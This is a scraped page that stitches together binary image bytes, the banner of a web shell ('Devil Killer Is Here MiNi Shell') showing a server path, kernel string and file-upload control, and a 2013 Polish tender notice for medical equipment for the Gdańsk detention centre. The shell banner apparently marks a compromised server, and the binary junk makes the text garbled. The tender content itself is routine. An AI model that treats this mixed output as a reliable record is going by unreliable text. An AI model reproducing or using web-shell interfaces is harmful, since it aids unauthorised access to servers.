JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130523/86601-N-2013.html

<p class="kh_header"><b>Gdańsk: Przetarg nieograniczony nr 1/DSz/2013 na dotawę sprzętu medycznego do AŚ Gdańsk</b><br>
<b>Numer ogłoszenia: 86601 - 2013; data zamieszczenia: 23.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Kurkowa 12, 80-803 Gdańsk, woj. pomorskie, tel. 058 3231000, 3231260, faks 058 3025125.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony nr 1/DSz/2013 na dotawę sprzętu medycznego do AŚ Gdańsk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa w ciągu 60 dni od daty zawarcia umowy do siedziby zamawiającego transportem własnym wykonawcy i  na jego koszt sprzętu medycznego w postaci:  wirówki do kończyn górnych i dolnych, 2 łóżek rehabilitacyjnych, Holtera EKG i RR, kardiomonitora typu PC 300 lub równoważnego, elektrycznego ssaka medycznego, łóżka do pionizacji. Szczegółowy opis przedmiotu zamówienia podano w załączniku nr 1 do specyfikacji na stronie www.zp.sw.gov.pl.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie wypełnionego oświadczenia o spełnianiu warunków stanowiącego załącznik do SIWZ nr 1/DSz/2013</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie wypełnionego oświadczenia o spełnianiu warunków stanowiącego załącznik do SIWZ nr 1/DSz/2013</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie wypełnionego oświadczenia o spełnianiu warunków stanowiącego załącznik do SIWZ nr 1/DSz/2013</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie wypełnionego oświadczenia o spełnianiu warunków stanowiącego załącznik do SIWZ nr 1/DSz/2013</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonana na podstawie wypełnionego oświadczenia o spełnianiu warunków stanowiącego załącznik do SIWZ nr 1/DSz/2013</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający zastrzega sobie prawo żądania od wykonawców dokumentów poświadczających spełnianie warunków określonych w SIWZ w zakresie dotyczącym spełniania parametrów technicznych przez zaoferowane urządzenia medyczne.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 Ustawy Zamawiający dopuszcza  możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, jeżeli zmiany te są korzystne dla Zamawiającego lub konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Warunkiem takiej zmiany jest podpisanie aneksu do istniejącej umowy oraz udokumentowanie w/w okoliczności. Zamawiający zastrzega sobie prawo do żądania od Wykonawcy przed podpisaniem umowy lub w trakcie trwania dostawy dokumentów potwierdzających, że dostarczony sprzęt medyczny spełnia warunki określone w SIWZ nr 1/DSZ/2013 oraz jest dopuszczony do świadczenia usług medycznych na terenie Rzeczypospolitej Polskiej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Kurkowa 12; 80-803 Gdańsk, mail:as_gdansk@sw.gov.pl, fax: (58)3025125.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2013 godzina 13:30, miejsce: Sekretariat AŚ Gdańsk ul. Kurkowa 12; 80-803 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wirówka do kończyn górnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Urządzenie medyczne przeznaczone do masażu wirowego okolic dłoni, przedramion i stawów łokciowych. Masaż ma być prowadzony przy min. 4 dysze o regulowanym kierunku wypływu strumienia wody montowanych na ścianie wanny. Minimalne wymagane parametry techniczne:
wymiary zewnętrzne +-10% - szer. 790 mm, wys. 930 mm, dł. - 770 mm
system napełniania: automatyczny
odpływ automatyczny
zasysanie sitkiem filtrującym
system napełniania ciepła/zimna woda
ustawienie wybranego poziomu wody: automatyczne
regulacja napowietrzenia wody - tzw. bierny masaż perełkowy.
pojemność użytkowa (robocza) min. 20 l
pojemność całkowita min. 30 l
pompa z tworzywa sztucznego galwanicznie oddzielona - 230V, 50 Hz, 
pobór mocy max 1 kW
elektroniczne sterowanie umożliwiające m.in.: włączenie urządzenia, napełnianie wody do żądanego poziomu, zabezpieczenie pompy przed pracą na sucho, ustawienie czasu zabiegu, automatyczne wyłączanie urządzenia po upływie zadanego czasu
timer (zegar)
minimalny okres gwarancji: 24 miesiące
instrukcja w języku polskim
dodatkowe standardowe wyposażenie takie jak: prysznic ręczny, krzesło niskie regulowane do wanny - 1 szt, środek czyszczący - 1 l.

Urządzenie musi być fabrycznie nowe (rok produkcji: 2013 lub 2012), kompletne i po zainstalowaniu gotowe do pracy bez żadnych dodatkowych zakupów i inwestycji. Cena zawiera koszty dostawy i zamontowania urządzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wirówka do kończyn dolnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Urządzenie medyczne wykorzystywane zarówno do masażu wirowego kończyn dolnych (gdy pacjent siedzi na wysokim krześle), jak i do masażu wirowego kończyn górnych (pacjent wkłada rękę do wanny siedząc na niskim krześle). Masaż odbywa się za pomocą m.in. 4 dysz z regulacją kierunku wypływu strumienia wody na stałe umieszczonych na ścianie wanny. 
Wymagane minimalne parametry techniczne:
 - dwa poziomy napełniania wody (połowa/cała wanna, I poziom w granicach 40-60% całości) ograniczające zużycie wody
prysznic ręczny
regulacja napowietrzenia wody - bierny masaż perełkowy
system napełniania: automatyczny
ustawienie wybranego poziomu wody: automatyczny
elektroniczny panel sterowania
zabezpieczenie pompy przed pracą na sucho
wymiary zewnętrzne (wys. x szer. x dł) +-10%: 780 x 580 x 1080
wymiary wewnętrzne (wys. x szer. x dł) +-10%: 670 x 500 x 650
pompa z tworzywa sztucznego 
zasilanie- 230V, 50 Hz
maksymalny pobór mocy 1 kW
zasysanie sitkiem filtrującym
automatyczne wyłączanie urządzenia po upływie zadanego czasu
dodatkowe standardowe wyposażenie takie jak: prysznic ręczny, krzesło niskie regulowane do wanny - 1 szt, środek czyszczący - 1 l.
minimalny okres gwarancji: 24 miesiące

Urządzenie musi być fabrycznie nowe (rok produkcji: 2013 lub 2012), kompletne i po zainstalowaniu gotowe do pracy bez żadnych dodatkowych zakupów i inwestycji. Cena zawiera koszty dostawy i instalacji urządzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Łóżko rehabilitacyjne-2 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalne parametry techniczne urządzenia oraz wymagania:

minimalne wymiary łoża: 2000 x 900 mm
minimalne wymiary zewnętrzne: 2140-2340 x 950 mm
minimalny zakres regulacji wysokości: 450-800 mm
Kąt odchylenia oparcia pleców - 0 do 75o 
kąt odchylenia oparcia uda - 0 do 45o 
minimalne obciążenie-170 kg
leże czterosegmentowe
sposób regulacji: wysokość leża, kąt oparcia pleców oraz uda sterowane elektronicznie przy pomocy pilota przewodowego
sekcja podudzia sterowana za pomocą mechanizmu zapadkowego
 kąt przechyłu Trendelenburga oraz anty-Trendelenburga sterowany za pomocą sprężyn gazowych z blokadą
pilot przewodowy z możliwością blokowania poszczególnych funkcji przez personel
poziomica leża
elastyczne krążki odbojowe oraz listwy ochronne
wyjmowane szczyty z wypełnieniami z tworzywa
tuleje do mocowania wysięgnika lub wieszaka kroplówki
uchwyty do mocowania wyposażenia dodatkowego
koła jezdne w obudowie tworzywowej
centralna blokada kół, przy czym jedno z blokadą kierunkową
autoregresja segmentu oparcia pleców oraz uda
dodatkowe wyposażenie łóżka w postaci: barierki lewej, materaca, wieszaka do kroplówki, uchwytu kaczki, basenu i uniwersalnego, wysięgnika z uchwytem do ręki
minimalny okres gwarancji: 24 miesiące

Łóżka rehabilitacyjne muszą być fabrycznie nowe (rok produkcji: 2013 lub 2012), kompletne i po zainstalowaniu gotowe do użycia bez żadnych dodatkowych zakupów i inwestycji. Cena zawiera koszty dostawy i instalacji wraz z dodatkowym wyposażeniem ujętym w w/w specyfikacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Holter EKG-zestaw.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw winien się składać z:

1. Analizatora holterowskiego o parametrach: 
- Edycja pobudzeń z możliwością reklasyfikacji z każdego poziomu analizy
- Prezentacja  histogramów pobudzeń
- Superimpozycja pobudzeń z każdego szablonu
- Automatyczne rozpoznawanie, z możliwością reklasyfikacji, podstawowych typów arytmii
- Automatyczna detekcja migotania przedsionków oraz możliwość ręcznego oznaczania epizodów migotania
- Analiza ST z możliwością weryfikacji i korekcji markerów pomiarowych
- Możliwość zmiany linii bazowej, kryteriów uniesienia i obniżenia ST
- Analiza alternansu załamka T
- Analiza HRV  w dziedzinie czasu i częstotliwości
- Ocena wpływu leków na moc widma
- Analiza QT
- Analiza późnych potencjałów w dziedzinie czasu i częstotliwości
- Ocena zapisów min. 3 kanałowych
- Analiza bezdechu sennego
- Ocena pracy różnych typów stymulatorów
- Dodatkowy kanał dla wizualizacji pików rozrusznika
- Wektokardiografia
- Tworzenie raportów w oparciu o szablony zdefiniowane przez użytkownika
- Instrukcja i oprogramowanie w języku polskim
- Przedmiot zamówienia fabrycznie nowy (rok produkcji 2012 lub 2013)
- Dopuszczenia i certyfikaty zgodnie z obowiązującymi przepisami

2. Rejestratora holterowskiego EKG - 3 kanały o parametrach:
- Rejestrator cyfrowy z zapisem 3 kanałowego EKG  do 5 dni
- Częstotliwość próbkowania 4000 Hz dla rejestracji 3 kanałowej
rejestracja 3 kanałów z 7 elektrod EKG
zasilanie z 1 baterii AAA
fabrycznie nowy (rok produkcji 2012 lub 2013)

Wymagana instrukcja obsługi przedmiotu oferty w języku polskim
Dopuszczenia i certyfikaty zgodnie z obowiązującymi przepisami

3. Stanowiska komputerowego o minimalnych parametrach:
Komputer: jak w tabeli oraz drukarka laserowa min. 10 str/min lub 


Minimalne parametry techniczne komputera
Komputer stacjonarny
Laptop
Rozdzielczość
1280 × 1024
1280 × 800
HDD
320GB
160GB
RAM
1GB
1GB
CPU
C2D
C2D
System operacyjny
Windows XP, Windows Vista, Windows7
Windows XP, Windows Vista, 
Windows 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Holter RR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagane parametry: 
- Rejestrator fabrycznie nowy (rok produkcji 2012 lub 2013)
- Pomiar ciśnienia metodą oscylometryczną
- Programowanie min. 3 okresów pomiarowych z poziomu dedykowanego oprogramowania
- Programowanie częstości pomiarów dla każdego okresu z poziomu dedykowanego oprogramowania
- Możliwość wykonania do 250 pomiarów
- Zakres pomiarów ciśnienia: 25÷260mmHg
- Dokładność: ? 3mmHg
- Zakres pomiaru tętna: 40÷200bpm
- 2 rozmiary wielorazowych mankietów w zestawie z rejestratorem ( średni i duży)
- Mankiety wyposażone w elastyczne rękawy zapobiegające zsuwaniu się z ramienia pacjenta 
- Przycisk do ręcznego wykonania pomiaru poza zaprogramowanym harmonogramem
- Prezentacja wartości napięcia źródła zasilania rejestratora przy jego uruchomieniu
- Zasilanie rejestratora: akumulator lub baterie AA
- Dopuszczenia i certyfikaty zgodnie z obowiązującymi przepisami
- Rekomendacja Europejskiego Towarzystwa Nadciśnienia Tętniczego

OPROGRAMOWANIE:
- Oprogramowanie w języku polskim
- Komunikacja z rejestratorem poprzez interface podłączany w komputerze do portu USB typ A
- Wbudowana baza danych pacjentów
- Wyświetlanie w formie tabelarycznej wszystkich wykonanych pomiarów z zaznaczeniem pomiarów wykonanych na żądanie
- Możliwość ręcznego wpisania komentarza do każdego pomiaru lub wybrania z listy proponowanych komentarzy
- Informacja o błędnym pomiarze
- Możliwość usuwania pomiarów z analizy
- Prezentacja wyników pomiarów ciśnienia częstości rytmu w formie graficznej (2 typy wykresów)
- Możliwość porównania 2 badań tego samego pacjenta
- Możliwość ręcznej edycji progów ciśnienia dla wykonanego badania
- Możliwość automatycznego ustawienia progów ciśnienia wg norm JNC7/AHA i ESH
- Możliwość rekonfiguracji okresów badania (zakresów czasowych) dla wykonanego badania
- Możliwość edycji danych pacjenta
- Możliwość wpisania (i edycji) przez lekarza wywiadu, aktualnego leczenia z podaniem leków, ich dawki i częstotliwości podawania, opisu

Prezentacja wyników statystycznych badania:
- ciśnienie skurczowe
- ciśnienie rozkurczowe
- częstość rytmu
- MAP
- PP
- ładunek BP
- DIP podczas snu z podziałem na okresy i łącznie dla całego badania
- Prezentacja średnich godzinowych w formie tabelarycznej wartości: ciśnienia skurczowego, rozkurczowego, częstości rytmu, MAP, PP, PRP/1000
- Prezentacja średnich godzinowych w formie graficznej wartości ciśnienia skurczowego, rozkurczowego, częstości rytmu. Możliwość porównania z innym badaniem tego samego pacjenta
- Możliwość wyboru automatycznego podsumowania badania na podstawie norm JNC7/AHA i ESH/AHA
- Możliwość konfiguracji raportu
- Możliwość eksportu raportu w formie pliku PDF
- Możliwość eksportu wykonanego badania do GDT i ASCII. 
- Wbudowany konfigurator eksportu
- Możliwość eksportu wybranego badania za pomocą poczty e-mail
- Możliwość testu poprawności komunikacji oprogramowania z rejestratorem
- Możliwość programowania różnych konfiguracji ustawień oprogramowania
- Możliwość konfiguracji wielu użytkowników z dostępem chronionym hasłem
- Funkcja automatycznego wylogowania użytkownika po określonym (konfigurowalnym) okresie bezczynności
- Instrukcja oprogramowania i rejestratora w języku polskim

Cena musi obejmować: oprogramowanie z kluczem zabezpieczającym, kabel połączeniowy USB, USB, rejestrator,  mankiet standardowy i duży, futerał z paskiem na rejestrator, zestaw akumulatorów, ładowarka,  instrukcja obsługi w języku polskimi, transport, instalacja i 24 miesięczna gwarancja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kardiomonitor typu PC 300 lub równoważny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Minimalne parametry techniczne urządzenia oraz wymagania:
 możliwość monitorowania szerokiego zakresu parametrów: EKG, tętno (HR), częstość oddechów (RR), wysycenie krwi tlenem / saturacja (SpO2), puls (PR), nieinwazyjny pomiar ciśnienia krwi (NIBP), temperaturę, analizy odcinka ST
monitor przeznaczony dla dorosłych . Wybór grupy pacjenta z menu z dostosowaniem granic alarmowych. Kardiomonitor wyposażony w akcesoria odpowiednie dla grupy wiekowej pacjenta.
  kolorowy wyświetlacz LCD z prezentacją na ekranie monitora 5 krzywych dynamicznych oraz wartości cyfrowych. Różne konfiguracje ekranu: duże cyfry, parametry, trendy 24-120, 7 EKG, oxyCRG.
kardiomonitor wyposażony w torbę transportową
możliwość zamrożenia krzywej EKG do analizy odcinka S-T.
kardiomonitor posiada trendy tabelaryczne i graficzne mierzonych parametrów.
analiza arytmii i odcinka S-T.
dźwiękowe i wizualne alarmy z możliwością wyciszenia i dostosowania granic alarmowych.  
pamięć zdarzeń alarmowych.
tryby pomiaru NIBP: ręczny (bezpośredni przycisk na panelu monitora), automatyczny, STAT.
funkcja opaski uciskowej.
zabezpieczenie przed nadmiernym ciśnieniem w mankiecie.
kardiomonitor musi posiadać wbudowany akumulator do min. 2 godziny pracy z możliwością wymiany przez użytkownika bez konieczności wzywania serwisu.
możliwość wykorzystania zewnętrznej drukarki współpracującej z kardiomonitorem.
kardiomonitor musi posiadać  Certyfikat CE, Deklarację Zgodności, Powiadomienie do Rejestru Wyrobów Medycznych oraz Certyfikat Jakości Wytwórcy, menu oraz instrukcję obsługi w języku polskim.
gwarancja  min. 3 lata
  wymagane wyposażenie urządzenia: czujnik SpO2 klips na palec dla dorosłych, kabel EKG, elektrody EKG, mankiet NIBP dla dorosłych, czujnik temperatury, rączka/stojak do kardiomonitora, pokrowiec, bateria, kabel / adapter sieciowy.
W zestawie Pulsoksymetr posiadający wysokiej klasy wyświetlacz LCD z podświetleniem LED.
- obrazowanie wartości saturacji (SpO2), pulsu (PR), siły pulsu, daty i godziny, poziomu naładowania baterii, podłączenia czujnika.
- wizualne i dźwiękowe alarmy z możliwością wyciszenia oraz dostosowania granic alarmowych.
- min. 12 godzinne magazynowanie danych z możliwością eksportu do PC.
- pulsoksymetr przeznaczony dla dorosłych,(w zestawie czujnik SpO2 klips na palec dla dorosłych ).
- możliwość zasilania z baterii oraz z sieci przy pomocy kabla sieciowego. Kabel sieciowy na wyposażeniu.
- pulsoksymetr wyposażony w statyw.
- instrukcja obsługi w języku polskim.
- Certyfikat CE, Deklaracja Zgodności, Powiadomienie do Rejestru Wyrobów Medycznych
Zestaw kardiomonitora z pulsoksymetrem musi być fabrycznie nowy (rok produkcji: 2013 lub 2012), kompletne i po zainstalowaniu gotowe do użycia bez żadnych dodatkowych zakupów i inwestycji. Cena zawiera koszty dostawy i instalacji wraz z dodatkowym wyposażeniem ujętym w w/w specyfikacji oraz podstawowe przeszkolenie z zakresu obsługi urządzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
